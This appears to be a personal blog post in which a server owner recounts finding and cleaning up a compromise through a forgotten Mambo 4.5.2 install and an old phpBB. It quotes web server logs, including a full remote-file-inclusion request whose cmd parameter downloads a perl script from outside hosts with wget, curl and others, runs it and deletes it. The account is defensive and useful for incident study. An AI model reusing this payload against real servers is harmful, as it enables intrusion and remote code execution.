It would appear that some nasty hackers found a hole in one of my web applications on Fathers Day.
The first indication of trouble was that my SSH connections started getting dropped yesterday. When I logged back in, I noticed that they load average on the server was 3. That’s pretty high for my box.
So I started poking around. I ran top and noticed that there were a couple of perl processes using a lot of CPU. Then I ran ps -ef and discovered that there were some “extra” httpd processes running.
I installed my Apache from RPM, so that means it runs out of /usr/sbin but ps was showing that there were apache processes running from /usr/local/apache/bin. I don’t even have a /usr/local/apache/bin directory. So I knew something was up.
So I killed the extra processes and started poking around. I found some interesting things in the /tmp directory. There were files named bodescan.txt, nerd.txt and scan.txt. And they were all perl scripts. Actually, they were all variations on the same script.
Then I noticed that the extra processes had come back! Oops. So I killed them again and then stopped the real web server as it appeared to be the attack vector. That made the rogue processes stop appearing.
Time to start poking around in the logs.
The main web server error log had stuff like this in it:
–12:54:22– http://www.bde1337.kit.net/nerd.txt
=> `nerd.txt’
Resolving www.bde1337.kit.net…
201.7.184.2
Connecting to www.bde1337.kit.net|201.7.184.2|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 29,684 (29K) [text/plain]0K ………. ………. …….. 100% 53.25 KB/s
12:54:23 (53.25 KB/s) – `nerd.txt’ saved [29684/29684]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 3 29684 3 1165 0 0 2108 0 0:00:14 –:–:– 0:00:14 2108
^M100 29684 100 29684 0 0 27066 0 0:00:01 0:00:01 –:–:– 52424
sh: fetch: command not found
sh: lynx: command not found
Oh dear. They are getting the web server to download files and then run them. That’s a classic attack.
So how were they getting in? It took me a while, and I discovered that I had quite a bit of old stuff on the server, but I finally found that they were getting in via a 4.5.2 version of Mambo with a plugin in it for uploading images. The server log line for the attack looks like this:
189.12.192.113 – – [18/Jun/2007:01:44:26 -0500] “GET /mambo/index.php?_REQUEST=&
_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path
=http://www.freewebs.com/renayro/tool25.dat?&cmd=cd%20/tmp;rm%20-rf%20r00tlab*;w
get%20http://h1.ripway.com/brn86/r00tlab.txt;lwp-download%20http://h1.ripway.com
/brn86/r00tlab.txt;fetch%20http://h1.ripway.com/brn86/r00tlab.txt;curl%20-o%20r0
0tlab.txt%20http://h1.ripway.com/brn86/r00tlab.txt;GET%20http://h1.ripway.com/br
n86/r00tlab.txt%20>r00tlab.txt;lynx%20-source%20http://h1.ripway.com/brn86/r00tl
ab.txt%20>r00tlab.txt;perl%20r00tlab.txt;rm%20-rf%20r00tlab.txt* HTTP/1.1” 200 8
490 “-” “Mozilla/3.0 (compatible; Indy Library)”
The oddest thing to me is that this Mambo installation is not actually being used for anything, and shouldn’t be linked to anywhere. How did they find it? Scanning I suppose.
I also discovered an installation of phpBB that was really old (2.0.11) and I had totally forgotten about it. (It wasn’t even being used for anything.)
But some hackers found it. Heh. At least all they did was deface it. It’s gone now too.
I have disabled and removed what I can, and I still have to make sure everything else is upgraded to the latest version, but I think I’m all clean for the moment. We’ll watch it for a while and see what happens.
